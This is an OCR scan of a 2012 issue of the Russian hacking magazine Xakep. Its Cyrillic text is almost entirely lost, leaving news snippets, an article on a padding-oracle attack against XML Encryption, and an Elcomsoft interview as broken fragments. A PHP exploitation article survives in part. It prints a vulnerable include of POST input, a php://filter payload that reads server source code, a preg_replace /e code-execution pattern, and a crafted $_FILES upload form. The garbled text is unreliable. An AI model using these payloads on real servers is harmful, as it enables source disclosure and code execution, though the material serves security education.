Fl 01 [156] 2012 ENCRYPTION XML-KOHTEHTA -·- -·- PHONEGAP : HTML5 -·- ANDROID hf.fun media UJ =.-- -; _0 n:1 iiiiiiiiiiiiiiio www.epidemz.net

Xakep 01_2012


Xakep journal


  • Fl 01 [156] 2012

    ENCRYPTION XML-KOHTEHTA .

    ,

    --

    --PHONEGAP:

    HTML5

    --

    ANDROID

    :230.

    (gam]land hf.fun media UJ =.---; _0 n:1 iiiiiiiiiiiiiiio -~ -N

    www.epidemz.net


  • lntro

    : , . , :

    100%. , 250 ,

    . ? , , :

    , . - .

    . : 1-3 , - . ,

    : >> , . ,

    . , nn, , - .

    , . , : . , , , .

    n : 115 !

    shop.g lc. ru/ xakep. , , -

    . : !

    01/156/201 2

    nikitozz, rn. . shop.glc.ru/xakep

    vkontakte ru/xakep mag

    -,rp.HEP ..... ~

    -

    PC_ZONE UNIS

    nikitozz )) [nikitozfareal.xakep.rul ctstep (steprareaJ. xakep.ru )

    c(gorl ([email protected])

    Step)) [stepffireal.xakep.rul (magglareal.xakep. ru l

    MALWARE SYN/ACK UNIXOID

    . Klouniz (alexanderfareal xakep.rul ccdushock>> (adushockfareal.xakep.u )

    R- xakep.ru

    DVD Ui- Security-pae

    ART

    ccgol)) (golumfaeal.xakep.u 1 (pofakumekay.com) [ g igorievafaglc . ru ) ixafaeal . xakep. ru l

    ant)) (antfareal.xakep.u l ccAd ushock andrushockfareal.xake .ru) 01g1 >> levdokimovdsfagmail.com)

    (aliklaglc. rul

    -

    : . : .

    PUBLISHING 000 , 115280, , . , 19, n, 5 , No 21. .: 1495/935-7034, : 1495/545-0906

    no

    -

    . : 1495/935-7034, : 1495/545-0906

    n TECHNOLOGY

    -

    ( f il atovacl glc ru l (olgaemlfaglc.ru) /alekhinalaglc.rul

    ([email protected] ( ] (ta tarekova@g lc .ru l /gospodinovataglc u l ([email protected]/ (bulanovalaglc.rul

    /korenfeldlaglc.rul

    l koshelevafaglc . u ) [email protected]]

    llukichevafaglc.ru )

    : V- : claimfaqlc.ru . n : (495)545-09-06 nn : 1495/663-82-77 : 8-800-200-3-999 : 101000, , , / 652,

    , 77-11802 14.02.2002 n Zapolex, . 219 833 .

    . n . , n , . . - n. : contentrglc.ru . 000 , , 2012


  • HEADER 004

    011

    MEGANEWS hacker tweets -

    COVERSTORY

    018 L Encryption

    L

    016

    017

    OMOHKASIRI

    004

    8 Dropbox AdWords Proof-of-cocept SS- 100

    COVERSTORY

    030

    COVERSTORY

    ,

    Adobe


  • 036

    042

    046

    PCZONE hnG:nL5

    Windows-apoe

    Widows-cce

    Widws-?

    - 050 Easy-Hack

    054

    060

    064

    068

    072

    D5

    - SpyEye Lotus, Lotus Oomio tll X-Tools

    074 --

    - MALWARE 080

    084

    Wi32/0uqu: Stuxet

    : bootkit test BitDefede, ESET NOD32, F-Secue, Outpost Secuity, Risig >>

    - 088 .N-

    .NET Famewok

    094 ,

    098 -

    - UNIXOID 102

    107

    112

    117

    Linux ! tcpdump

    did-

    - Ubuntu 11.10 Oneiic Ocelot

    - SYN/ACK 118

    122

    - FERRUM 126 NAS

    130

    -132

    -136

    139

    142

    144

    5- 6- NS- Silicon

    PoweSP060GBSSOV30525

    PHREAKING Loop

    , n n n

    FAOUNIED

    FAQ 8.5 WWW2 w-

    2012 NY2k+ 12


  • EGANEWS SIRI

    OMOHKASIRI


  • ltel 11 11 -11 11 11 11 , . ltel 2011 . . ltel, ltel , ltel . . * .


  • MEGAN EWS & F , 600 .

    POLAROID !

    2008 n Polaoid ,

    w 11- . ,

    Polaoid

    n , 11-

    n n .

    Polaroid: Z340 Instant Digital Camera. ZINK (Zero Ink Printing).

    n >> , . n, . , , n ,nn

    n . 14 Mn. n 2, 7"

    SD. I 43 ] F/3,2. [ -1280 720 n]. Polaroid Z340 n 76 102 , $20 30 . - ,

    , no , 25 n. n , Polaroid. Z340 Instant Digital Camera $300.

    AVIRA AESCRIPT.DLL 006

    DNS ,

    , DNS-apeco.

    , , -

    n. DNS - Hotmail, Gmail, Google, Microsoft

    , Uol, Terra Globo. , , , google.com ,

    I- Google, -. n

    . n, Google n

    n Google Defender, n .

    , , 27- n ,

    n DNS-cepepax , DNS-.

    , , n Ghost Click .

    -

    , n DNS Changer. OS Windowsoep DNS. I- n 15 ! ,

    , n . 100 , n 500 n .

    [ n], n


  • MEGANEWS , CONSUMERIST, RIAA .

    ! , WI-FI,

    , , , . , , . -, ,

    10 , /GS. ,

    , , , , 802.11 .

    -, . , ,

    , [ 100 ), 802 .1 1, .

    , . , ,

    . , - , - .

    . , - , .

    iPhone45,

    ,

    , . Apple n

    - :).

    Jj ._d

    -

    .....

    ~

    -

    ~ KaneOIAII~

    WEXLER.BOOK 7001. Wexler WLR. 7001 7.0" , . 4

    ( 32 microSDI , , ; F. -

    1500 mAh, , . ,

    . WEXLER.BOOK 7001 . : 5 990 .


    . , 1.6.4. . ,

    , . , ,

    . , , ,

    . , CMS,

    , . , 1.6.4, 6 , . ,

    . . , .

    [CDN) .

    ,0 -'- - ~ - - - -., ,_",,.,,.. 1 - " _ ,._""_, ___ - - ,.

    Firefox with Bing

    ing

  • t'

    ' !..' -' -

    ..;;.

    ~ r . ' . -z.. .. \--.:,,,.

    j ll_ ~:-~

  • MEGANEWS ENTENSYS COMMTOUCH , 6, 7% n .

    ,

    >> .

    YouTube : Aoymous [Zetasl . , >> , , >> , . , 26 2011

    - - . , - .

    -. Anonymous , - ,

    . , , , -

    >> , , . , OpCatel [n

    ~. , , , , .

    , , - , OpCatel .

    . . , ,

    , , . . .onion- Hidden Wiki,

    . , . - , Freedom Hosting. ...

    : Freedom Hosting, 40 ,

    :

    Lolita City - , 100 . Freedom Hosting, , >>. Operation Darknet

    S- . , Lolita City SQL- . , , ~ .

    n: pastebin.com/1LHnzEW.

    n Anonymous n

    . n , ,

    - 2000-6000 . 38

    .


  • @EdiStrosar: , >> [ l.

    @jkouns: . Ggl-- .

    I-: http:!/4 .. 2; http:/196.4; ht.p://71.3; ht.~. ...

    @Rogunix: DoS/- ICMP RefCount TCP/IP [MS11-083] 232 UD-, , 250 52. t.co/aY.PCMyRy.

    @fjserna: Microsoft/MSRC . ! Google. ++.

    1!!!1 : lilil -

    , , , . !


    .

    @iLLUMINATI: ,

    .

    @WeldPond: Google,

    OllyDbg IDA _noRE.exe

    .

    1!!!1 : lilil -. :1

    , Google Wi-Fi, _nomap. :1

    @insitOr: 0day BIND.

    : DNS-cepepa BIND, DoS 0day.

    Shodan , Siemens Simatic.

    t.J;o 1l1Q0b3cq.

    1!!!1 : lilil . SCADA-

    . S- - .

    @mikko: -

    , :

  • MEGANEWS ( 926 ), , . .

    ! ,

    [map: location of infected computers]

    Nitro, ,

    .

    .

    Stuxnet, , - , n , n . , , Symantec. ,

    Nitro, n , . 29 19 , [,

    ]. n , n. - , .

    [ Poison Ivy]. , . Symantec ,

    . Nitro : , .

    & . ,

    .


    & BSUP a . ,

  • MAIL.RU GRU , Twitter. , .

    HAANDROID'E

    FXI , The Cotton Candy

    $200, n 2012 . ,

    cWindows 8

    .

    FXI . The Cotton Candy [ - , 21 , , ! . USB-,

    . R- Samsung Exynos 1,2 [ , Samsung Galaxy S II].

    Mali-400, microSD [ 64 ], Wi-Fi, Bluetooth, HDMI2 .1 USB 2.0. ,

    n 1 . h Cotton Candy Android 2.3. , , , Android.

    . HDMI, USB [ n ]. Bluetooth , .

    Android Market, .

    , GOOGLE ?

    SSID ,

    GOOGLE

    BITCOIN , BITCOIN

    n BitCoin n .

    , , . ,

    n Mt Gox, BitCoin, , . , BitCoin , , , n

    .

    Intego, ,

    DevilRobber, BitCoin . . ,

    , , , , , BitCoin, , . DevilRobber OS X ,

    n . The Pirate . ,

    GraphicConverter OS X . n ,

    . , DevilRobber itin - , .

    . DevilRobber , Safari, Vidalia, Firefox, TOR. , DevilRobber

    , , . BitCoin . Oper

    Microsoft n ,

    . , BitCoin.

    : 1 n 2, , 50 , 1 .

    , n , . ,

    , n , BitCoin. - .

    n ,

    . , . , .

    , BitCoin, :

    n , , - >>.


  • MEGANEWS LINUX3.1, kl .g .

    CTAHAADOBE FLEX FLASH

    d Flash n 750 ( 7

    % n!

    n .

    Adobe n n n Flash ]. Flash n n , n n Adobe AIR n n.nn n Android PlayBook, n

    n . Flash Player n n n HTML5. n n , n n Flash. , , n Apple, , n-n

    n Flash Player iOS. , Flash Player n Apple iOS

    ,- n . Adobe Flash n - >> Apple. , n Flex SDK. Flex 4.6 SDK, 29 , n n source.

    , , ,

    , , n . , , , n . iSpy n 100%. , , n

    iPhone ndid n

    [magnified keysl. iSpy n n, n,

    n n - ! , .

    n , 60 . n n 90% . n , n . n , , n n . n DSLR-aep n n 12 . iSpy

    magnifi ed key n - .

    . DARPA Shdd Challenge

    . , .

    50 .

    AMAZON .

    , 2012 .

    GGL

    42 47 .


  • 500 Wikimedia.

    IPHONE ~~>>

    . ",--"

    iPhone Dev-Team n iPhone4S.

    , .

    n, , .

    iPhone 4S ,

    . Chronic Dev Team - iPhone . , , ,

    iPhone, & , .

    , , , , iPhone 4S, iPhone

    : iPhone 4 iPhone 3GS, . , ,

    >> . , , . : 51 - & , , ,

    . & ! >>, >>, , l.

    , - youtu.be/gofpeiTXI5U. :

    & 1611) ; ; SIM- & T-Mobile; , Wi-Fi !

    , );

    , iPhone ; ; EDGE ;

    20-30 ; iPhone, ;

    MCAFEE:

    space

    , >; SIM-, ;

    SIM- T-Mobile . . ,

    iPhone T-Mobile, .


  • .HEADER

    Proof-of-Concept SS-

    100

    , . , SQL-, , , . , ,- sqlmap, SQLi

    . , SS- . - . Damn Small XSS Scanner [DSXS].

    XSS . Cross-site scripting [XSS]- n , n

    n JS-. n . SS- n

    . - , , n, n -.

    n- n. n n

    , SS-.

    n XSS zero.webappsecurity.com


    SS- - n. n- n , n

    -n n . n

    n L- n GET/POST-anpoca .

    [ ] , n .

    , n, n SS-n. , -n

    . ,

    n . n,

    L- .. [ n ] ,

    n JavaScript-o. , n, n L- ,

    > n n JS-, ... .

    DSXS , n SS .

    ? n Python,

    GET- S- SS-,

    . Damn Small XSS Scanner [DSXS]

    , -, .

    , ,

    n . n , , n , ,

    > - . DSXS ,

    . -, DSXS , . n, . n [

    , n n], . ,

    n. , , n n

    User-Agent, Referer, Cookie - . n GitHub [https://github.com/stamparm/DSXS]. ::


  • HEADER

    10 DROPBOX ADWORDS 10 2 D , , , . 2 ,

    50 , . - $99,00 . , , - 250 . , 1 , ,

    - . , , D,

    -. , , [, bit.ly/ud69i ]. ,

    , D - - , , . , , 10 , D

    . AdWords !

    ? , [ bit.ly/xNKyB ]. , D- .

    , . ? , ,

    . - . , AdWords, . ?,,- . , ! , Google, 1000 . . . bit.ly/AEsg1 $75 AdWords, ,

    .: ] , e-mail [ - ], [ - about.me], . e-mail.

    [ ] .

    ? ? , ,- Google AdWords [adwords.google.com].

    -7 >> . [ , , ],


    . [ ] : 1. . 2. [, D]. 3. ,

    [, , , , ].

    3. >> : , 600 .

    . >> ,

    . : d, f online storage, online backup f, online backup, online backup data, d space.

    , - , Google.

    URL , D Referral Status [, http://db.tt/UfxuFBm ]. , .

    , , . ,

    . , [Cost-Per-Click].

    , . -

    , , . :] ? - ,

    D. -, . -, AdWords, , , [ Google]. . :] :::

    Updated            Status
    3/26/2011 7:45     Joined
    3/26/2011 6:52     Completed
    3/26/2011 6:37     Joined
    3/26/2011 6:08     Joined
    3/26/2011 5:23     Completed
    3/26/2011 5:14     Completed
    3/26/2011 4:49     Completed
    3/26/2011 4:32     Completed

    - 250 Dropbox


  • COVERSTORY

    =

    BEAST Padding Oracle Attack .NET Framework,

    XML Encryption,

    L-.

    .


    www.w3.org/TR/xmlenc-core/ XML Encryption

    w .

    bit l/ur , XML Encryption.

    [plaintext] [first@plaintext.su, www.plaintext.su]

    XML ENCRYPTION XML Encryption, W3C 2002

    , n XML Framework'ax [ n .NET, Apache Axis2, JBOSS . .[.

    - n, Microsoft Red Hat. XML Encryption n ,

    L- ,- , L-- . n , n

    . , AES DES . n n AES [ nn, - CBC].


  • ISJ*iiirIId , n [ 16 , 128 ! . ,

    , .

    n ~ . IIVI, XOR,

    . , :

    // encryption (CBC mode)
    C[0] = AES_ENC(k, IV xor M[0]);   C[i] = AES_ENC(k, C[i-1] xor M[i]);

    // decryption
    M[0] = AES_DEC(k, C[0]) xor IV;   M[i] = AES_DEC(k, C[i]) xor C[i-1];

    k - the key, M - the plaintext blocks, C - the ciphertext blocks, IV - the initialization vector.

    n . .

    , , : ,

    . , , 12

    Dx05. ! 16 !, , 15

    , 16- 10.

    , XML Encryption.

    ! !


    XML Encryption

    IV1[0]

    , BEAST Padding Oracle Attack. -

    . . , , n XOR IV MSK, IIV MSK, C[DJI [) MSK. , .

    , MSK, n , . ,

    . , , . XML Encyptio , .

    , , , ASC II . ASCI I . , NULL ! Al,

    ! Bl. , , , >>. ,

    , n . ,

    , 16 , tue, [) = AES_DEC_ CBC[k, IIV, C[OJII NULL, false -

    . , , .

    : 1. IV1,

    [I V1, C[O] I . niV, lniV, C[O]I . tu, IV1 = iV, false .


  • COVERSTORY

    WS-SECURITY

    WS-Security - SOAP, _

    -. WS-Security XML Encryption XML Signature.

    , 2-3 , , , .

    2. [, AES_DEC , ! . :

    msk = 0
    repeat
        msk++
        IV2 = IV1 xor ( 0 ... 0 || msk || 0 ... 0 )
        // msk sits at byte position j, all other bytes are zero
    until Server((IV2, C[0])) == true
    return X[j] = ASCIICode(NULL) xor IV2[j]

    :

    Input:  C = (IV1, C[0]) -
    Output: the j-th byte X[j] = AES_DEC(k, C[0])

    . j- , , j- . , ? : . [

    !:

    AES_DEC_CBC(k, (IV2, C[0])) = IV2 xor AES_DEC(k, C[0])

    ,

    I . [] ,

    [0]. XOR [] IV.

    . .

    XML XML ENCRYPTION Extensible Markup Language [XML]. XML ,

    [odel. , , XML < >

    . & s- & >>. XML XML ti.

    W XML Sigatue W XML ti, XM L [

    , . .l XML.

    XML ti, . , ,

    [ , , . . l . , , , .

    . . ,

    , . .

    John Smith l

    A123456 ...

    XML Encryption


  • n n , . n n n,

    n L- . , L-, . ?:-]

    XM L ti n n L- ! XML], n . n n . n td Element -, L-

    . Encypted Content , n

    , , . . n Encypted Text Contet, n Encypted Contet, , . , n n

    . , n XML Framework'o n n .

    - . XML Encryption n n

    UTF-8, n , n

    . n UTF-8- , , [line feed]

    [carriage return]. , n ASCII n UTF-8.

    n, ASCII n n 128 ! 4]. ,

    , .

    n n -. nn Apache Axis2 Framework, Rampart WS-Security. n XML Encryption XML Signature SOAP.

    n Axis2 Framework, n [message flow]. [message flow]- n , S- ! ],

    n n. S- n, n Message

    Receiver, , , Service n .

    Axis2 : st, Security Dispatch. Security,

    XML SIGNATURE

    XML Signature - n W3C. n n n XML.


    XML Encryption

    ?

    v Security, . , , , . . ,

    !, , -, , . ). -,

    , , . Axis2,

    ,- -. Padding Oracle Attack,

    l-, ASP.NET), .net.

    , . , XML S-.

    Dispatch. Message Receive, message flow SOAP n , .

    , Axis2 . :-]

    AXIS2 - , Axis2. ,

    , tue false

    . n security fault. security fault : 1.

    . , , , ? , n 0x01 0x10, n n .

    2. . n>> , ASCII 0x1F ! 09, , D- , ].

    - L- , & [0x26] > > .

    .

    n , ASCII ! ]. n n XML n >> >,

    .


  • COVERSTORY

    . , , , ,

    , 16- , true false. ,

  • Dec  Hex  Char  (Block 0)      Dec  Hex  Char  (Block 2)
      0   00   NUL                  32   20   SPC
      1   01   SOH                  33   21   !
      2   02   STX                  34   22   "
      3   03   ETX                  35   23   #
      4   04   EOT                  36   24   $
      5   05   ENQ                  37   25   %
      6   06   ACK                  38   26   &
      7   07   BEL                  39   27   '
      8   08   BS                   40   28   (
      9   09   HT                   41   29   )
     10   0A   LF                   42   2A   *
     11   0B   VT                   43   2B   +
     12   0C   FF                   44   2C   ,
     13   0D   CR                   45   2D   -
     14   0E   SO                   46   2E   .
     15   0F   SI                   47   2F   /

    Dec  Hex  Char  (Block 1)      Dec  Hex  Char  (Block 3)
     16   10   DLE                  48   30   0
     17   11   DC1                  49   31   1
     18   12   DC2                  50   32   2
     19   13   DC3                  51   33   3
     20   14   DC4                  52   34   4
     21   15   NAK                  53   35   5
     22   16   SYN                  54   36   6
     23   17   ETB                  55   37   7
     24   18   CAN                  56   38   8
     25   19   EM                   57   39   9
     26   1A   SUB                  58   3A   :
     27   1B   ESC                  59   3B   ;
     28   1C   FS                   60   3C   <
     29   1D   GS                   61   3D   =
     30   1E   RS                   62   3E   >
     31   1F   US                   63   3F   ?

    ASCII

    , . [ ,

    ] [ ]. , , XML 5chem'

    [L-] . , ,

    , , , . ,

    , .

    [ . ], u .

    ~ , ,

    XML Signature. , n XML Signature Wrapping, , n

    nn / . n- , n n .


    XML Encryption

    Dec  Hex  Char  (Block 4)      Dec  Hex  Char  (Block 6)
     64   40   @                    96   60   `
     65   41   A                    97   61   a
     66   42   B                    98   62   b
     67   43   C                    99   63   c
     68   44   D                   100   64   d
     69   45   E                   101   65   e
     70   46   F                   102   66   f
     71   47   G                   103   67   g
     72   48   H                   104   68   h
     73   49   I                   105   69   i
     74   4A   J                   106   6A   j
     75   4B   K                   107   6B   k
     76   4C   L                   108   6C   l
     77   4D   M                   109   6D   m
     78   4E   N                   110   6E   n
     79   4F   O                   111   6F   o

    Dec  Hex  Char  (Block 5)      Dec  Hex  Char  (Block 7)
     80   50   P                   112   70   p
     81   51   Q                   113   71   q
     82   52   R                   114   72   r
     83   53   S                   115   73   s
     84   54   T                   116   74   t
     85   55   U                   117   75   u
     86   56   V                   118   76   v
     87   57   W                   119   77   w
     88   58   X                   120   78   x
     89   59   Y                   121   79   y
     90   5A   Z                   122   7A   z
     91   5B   [                   123   7B   {
     92   5C   \                   124   7C   |
     93   5D   ]                   125   7D   }
     94   5E   ^                   126   7E   ~
     95   5F   _                   127   7F   DEL

    . - , n -, -, n . n -, ,

    n. , , ,-

    , , [, ISO/IEC 19772:2009], n

    XML Encryption . , , 051 [n, XML Encryption SSL/TLS, n 5] .

    , , , , epic fail . , XML Encryption n , n n side-channel, n . , , - , n . n Juraj Somorovsky and Tibor Jager, , n n . ::


  • .

    fopen, , file_get_contents . .

    , ,

    .

    PrOxor [php.m4sql@gmail.com, rdot.org/forum]

    $ FILES

    , .

    '-"

    bit.ly/sfDcys

    noce Lightning Template.

    bit.ly/ttvWV -n Lightning-Template.

    bit.ly/mdrdqfca,

    File path injection. pastebin.com/1edSuSVN - n

    File path injection.

    bit.ly/g6ztD - ,

    $_FILES.

    n

    n .

    , , 4.3 . [

    , . . l > . .

    , , . , :

    print_r(stream_get_filters());

    , . stream_filter_append/


  • stream_filter_prepend n n php://filter. , , . :

    $fp = fopen('php://output', 'w');
    stream_filter_append($fp, 'convert.quoted-printable-encode');
    fwrite($fp, "I \v Love \v PHP.\n");

    , POST, Base64 :

    readfile("php://filter/read=convert.base64-encode/resource=php://input");

    , , . , ft-, gz-, :

    copy('compress.zlib://ftp://user:[email protected]:21/path/file.dat.gz', '/local/ /of/file.dat');

    php://filter - . ,

    include($_POST['inc']);

    allow_url_include = Off>> RFI.

    -- S- :

    inc=php://filter/read%3Dconvert.base64-encode/resource%3D/ path/script.php

    , - . !

    ~ , , , . - . ,

    12. . , filter ! ] .

    , . $this-> _data >> :

    private $_data;

    while ($bucket = stream_bucket_make_writeable($in)) {
        $this->_data .= $bucket->data;
        $this->bucket = $bucket;
        $consumed = 0;
    }

    , $closing TRUE. :


    if ($closing) {
        $consumed += strlen($this->_data);
        $str = nl2br($this->_data);
        $this->bucket->data = $str;
        $this->bucket->datalen = strlen($str);

    i Secure [gist.github.com/600388/cd99ae03c3]

    {{ title }}

    {{ title }} | {{ name }} | {{ message }}

    Items {% for item in items %}

    {% if item %} {{ item }} {% endif %}

    {% endfor %}

    sample.php #

    <?php
    require_once 'LightningTemplate.php';

    $items = array('hoge', null, 'fuga', '', 'piyo', '');

    $lt = new LightningTemplate('sample.html');
    $lt->title = 'Sample Template';
    $lt->name = 'World';
    $lt->message = 'hi!';
    $lt->items = $items;
    echo $lt;


    sample_cache.php #

    <?php
    require_once 'LightningTemplate.php';

    $items = array('hoge', null, 'fuga', '', 'piyo', '');

    $lt = new LightningTemplate('sample.html',
        new LightningTemplateCache_File('./cache'));
    $lt->title = 'Sample Template';
    $lt->name = 'World';
    $lt->message = 'hi!';
    $lt->items = $items;

    n Lightning Template


  • COVERSTORY

        if (!empty($this->bucket->data))
            stream_bucket_append($out, $this->bucket);

        return PSFS_PASS_ON;
    }

    return PSFS_FEED_ME;

    , PSFS_PASS_ON. ,

    . . :

    stream_filter_register('convert.nl2br_string', 'nl2br_filter');

    , .

    , ,

    , . Google Code Search. stream_filter_register.

    Lightning-Template ! !, . , sample.html:

    {{ title }}

    class nl2br_filter extends php_user_filter {
        private $_data;

        /* filter initializer */
        function onCreate() {
            $this->_data = '';
            return true;
        }

        /* filter body */
        public function filter($in, $out, &$consumed, $closing) {
            /* accumulate all incoming buckets in '$_data';
               nothing is written out until the last chunk has arrived */
            while ($bucket = stream_bucket_make_writeable($in)) {
                $this->_data .= $bucket->data;
                $this->bucket = $bucket;
                $consumed = 0;
            }

            /* the last call (closing): process the accumulated data
               and hand the bucket on to the next filter */
            if ($closing && isset($this->bucket)) {
                $consumed += strlen($this->_data);
                $str = nl2br($this->_data);

                $this->bucket->data = $str;
                $this->bucket->datalen = strlen($str);

                if (!empty($this->bucket->data))
                    stream_bucket_append($out, $this->bucket);

                return PSFS_PASS_ON;
            }

            /* not closing yet: ask the stream for more data */
            return PSFS_FEED_ME;
        }
    }


    include("./LightningTemplate.php");
    $lt = new LightningTemplate('./sample.html');
    $lt->title = 'Title';
    echo $lt;

    L-:

    < head> My Title

    , L- . , include,

    . , - , . ,

    , L-. :

    public function filter($in, $out, &$consumed, $closing) {
        while ($bucket = stream_bucket_make_writeable($in)) {
            $patterns = array(
                '/\{%\s+if\s+(.+?)\s+%\}/e',
            );
            $replacements = array(
                '"..."',
            );
            $bucket->data = preg_replace($patterns, $replacements, $bucket->data);
            // ...
        }
    }

  • - php_user_filter. : filter, onCreate, onClose. filter, : 1. $in - , ,

    .

    - , phpseUm44, hello.txt.

    , !

    ). $_FILES :

    Array
    (
        [uploadfile] => Array
            (
                [name] => hello.txt
                [type] => text/plain
                [tmp_name] => /tmp/phpseUm44
                [error] => 0
                [size] => 33
            )
    )

    , $_FILES[uploadfile][type] Content-Type, . , -,

    , :

    $_FILES["file"]["type"] == "image/gif"

    , , . getimagesize(). , , , IF-

    , . , . , - pic.php.myext -. , - , . , $_FILES.

    , ,- . bugs.php.net ,

    , - . :) ,

    / , $_FILES[uploadfile] [name] . , , -. Uni-


  • COVERSTORY

    - . Windows-aax n . .

    . $_FILES. Qwazar, rdot.org. BlackFan, , , . . , ,

    :

    foreach ($_FILES["file"]["tmp_name"] as $key => $name) {
        echo "Size:" . $_FILES["file"]["size"][$key] . "<br/>\r\n";
        echo "tmp name: " . $_FILES["file"]["tmp_name"][$key] . "<br/>\r\n";
        if ($_FILES["file"]["size"][$key] > 0 && $_FILES["file"]["size"][$key] < ...) {
            // ...
        }
    }

    [screenshot: the onCreate method]


    <form action="upload.php" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="MAX_FILE_SIZE" value="10000000">
        <input type="file" name="file[size][">
        <input type="submit" value="submit">
    </form>

    - $_FILES :

    $_FILES["file"]["tmp_name"]["[name"]

    n :

    $_FILES["file"]["tmp_name"][$key]

    , $_FILES ( , ) . , .

    ( upload.php), L-, secret.php, , upload.php,

    : 1. secret.php,

    (, , ). 2. , .


  • . , , .

    , imagecreatefrom* ,

    , l , .,

    , . , base64_encode , , , :

    $jpegimage = imagecreatefromjpeg("data://image/jpeg;base64," . base64_encode(
        isql_result_array('imagedata')));
    imagejpeg($jpegimage);

    , , .

    , ,

    . , , .

    , -, , , , imagecreatefrom*/image*, :

    foreach ($_FILES["file"]["tmp_name"] as $key => $name) {
        echo "Size:" . $_FILES["file"]["size"][$key] . "\r\n";
        echo "tmp name:" . $_FILES["file"]["tmp_name"][$key] . "\r\n";
        $img = imagecreatefromjpeg($_FILES["file"]["tmp_name"][$key]);
        imagejpeg($img, './new_' . $key /* ... */);
    }

  • COVERSTORY

    S, I

    & - . . n

    - - - : n: ~~ n.

    0 .

    Elcomsoft. Advanced eBook Processor, n_~1 , - Defcon.


  • r.t - .... , IT, , ?

    il ! ~ . .- . ][J,

    , 6. - 100 . . 20 . . ,

    - ... , , - , . -

    . . , - ,

    . , , - ...

  • COVERSTORY , , . , , , : . , , . - , . , , ,

    , .

    ?

    1 ~ ,

    - ,

    . . , . , ,

    [ 97- ! . , , ,

    IT. . , , , 80 %.

    Elcomsoft, . , , , , . : .

    . n

    , ... .

    r.1 .:;.t ELCOMSOF

    ?

    l , ~

    . passwod v, , . , , . .

    , . , EFS

    Recovery . - , Active Directory.

    computer forensics . , ,

    , .

    , , , -

    . , Defcon 2001

    , - . - , - . - .

    , . , . , , ,

    , .

    .

    , , ELCOMSOFT.

    1 . ~ Access, . ,

    ... . , , . - , -


    . :1

    1 , ~ ,

    . - , , . 90-

    - , . Elcomsoft, . .

    r,1 , .

    1 , , , ... ~ ,

    Apple, iOS [ , iPhone 4S iPad 2]. , . , ,

    . , ,

    .

    r.1 APPLE .:;.t ,

    , ? ADOBE .

    l , ~ ,

    computer forensics. , , . , ... Apple , . , , .

    r.1 ... PDF

    ELCOMSOF ... ?

    l , pdf . ~

    . : >.

    - . , .

    r.1 .:;.t ADVANCED PROCESSOR, - 2001 DEFCON?

    l , . , ~ ,

    df-, . 2001 .

    ,

    , . , , . . Defcon. , ,

    12 20 . , , , Adobe.

    . Defcon , Advanced eBook Processor,

    . , , ,

    .


  • l , ... , ~

    , . - Spot the fed ! ).

    !, ),

    , , - .

    , , , - ,

    . . , , , ,

    , .

    r.1 , . 1.;.1

    , , .

    l ~ ~ ,


    , , . , , . ,

    , , . .

    . -.

    . , ,

    . : ,

    . -,

    11 . . , - ,

    , , , , . . , , . :

    . , , .

    . , .

    - , . , , , , , .

    - .

    r.1 , 1.;.1 ? ?

    l _ . ~ ,

    , 21 . , .

    , . 11 -, ,

    . , . - , , , ... ,

    . :) , , - .

    , . , , . - . , - .. .

    , .

    r.1 , 1.;.1 ADOBE

    ?

    l , , -, ~ Adobe

    . - ,

    Adobe, . Adobe , , . , : . ,

    .

    , , ?

    , , Elcomsoft. ,

  • COVERSTORY , .

    , , , , , . ,

    . , n

    .

    r.1 ... ?

    l , l -) ~ 50

    , Elcomsoft. , , , .

    , . , . , , . .

    , , - , . . ,

    2001 , 6 , 2002

    . , ! ), : , , , . depositio

    ! ) - . , : - ?>>. , : .

    , Elcomsoft

    . . 2001 , .

    r.1 , , ... 2002.

    ?

    l Elcomsoft ~ ,

    Public Interest]. , , 17

    Elcomsoft . . , ,

    . .

    ,

    ? , , - ?

    l . ~ .

    , .

    , - , . , .

    , , .

    r.1 ~- ... , ?

    ?

    l , ~

    . . - .

    r.1 , ...

    . ?

    l , ... ~ . ,

    . , , -

    , .

    ?

    - , . , , ...

    , , , . ,

    , ,

    . 9 .

    r.1 CONFIOENCE 2.0 ...

    CANON. ?

    l , ~ I) .

    - , 3000, ,

    , 3500. , n

    , , , ,

    . n 300,

    . , .

    n. , Magic Lantern, Canon , . Hackers Developers Kit, , >> >> .

    , n , ,

    . CONFidence 2.0. Nikon . lus-) .

    , , . , . Nikon .

    r.1 5-10 ... ,

    , ?

    l , ~ , Practical

    cryptography . , , , . ... , , . ,

    . , . , , .

    r.1 ... ?

    , ?

    l , . ~ ,

    . - ,

    . ,

    . , . ,

    , , , .

    , 1 % , . , . , , IT,

    - : n >>. , .

    , , , . :::


  • Preview

    11, n n n n

    : n ~ n ~n ~ n . . n n . n n

    n n, n n Lotus Domino Controller n n .

    n, n, n I .

    PCZONE

    36 HTML5

    Android iOS, ? n. n n n .

    500 n, . n

    n .


    30 . .

    ? n n, n , n

    n .

    MALWARE

    DUQU

    n ,

    n n n

    Stuxnet.

    ? - .

    , .

    I! , MBR, n, 5 nn

    .


  • PCZONE

    PhoneGap:o HTML5

    - , , .

    todo list Android iOS, , .

    Objective-C Java , , PhoneGap.


    iOS


    , Windows 8, , , , n n HTML5. , - , - , n n, . , n n n n HTML, JavaScript

    CSS!, PhoneGap. n n n n nn n: iOS, Android, Windows Phone, BlackBerry, WebOS, Symbian Bada.

    n n n [n, Objective-C iOS), API . , n n n,- HTML5 PhoneGap API. n L-, , ! API n n , n n n

    : , n, [ ), n , , ! ), . . , - . n jQuery Mobile Sencha,

    , [ n ) . n , n , n nn . - .

    n iOS- -, AppStore, n

    :). : , , , , Android. , n ,


  • .

    , . iOS .

    . n n .

    <div data-role="page" data-dom-cache="true" class="page-map" id="index">
      <div data-role="header">
        <h1>...</h1>
        <a href="#points" class="ui-btn-right" id="menu-points" data-transition="pop">...</a>
      </div>
      <div data-role="content">
        <div id="map-canvas">
          <!-- ... -->
        </div>
      </div>
    </div>

    data-dom-cache="true" , . data-transition="pop",

    >. , jQuery Mobile, [ bit.ly/vtXXM ] .

    PHONEGAP

    , PhoneGap

    > . ! . PhoneGap Build [build.phonegap.com] n .

    . , , .

    - PhoneGap, . [github.com/phonegap/phonegap-plugins],

    iPhone, Android, Palm, BlackBerry. iOS 20 r: BarcodeScanner [ -], AdPlugin [ iAd], NativeControls [ iOS ] .


  • PCZONE

    n :

    <div data-role="page" data-dom-cache="true" class="page-points" id="points">
      <div data-role="header">
        <a href="#" data-theme="b" data-icon="delete" id="delete-all">...</a>
        <h1>...</h1>
        <a href="#index" class="ui-btn-right" data-transition="pop" data-direction="reverse">...</a>
      </div>
      <div>
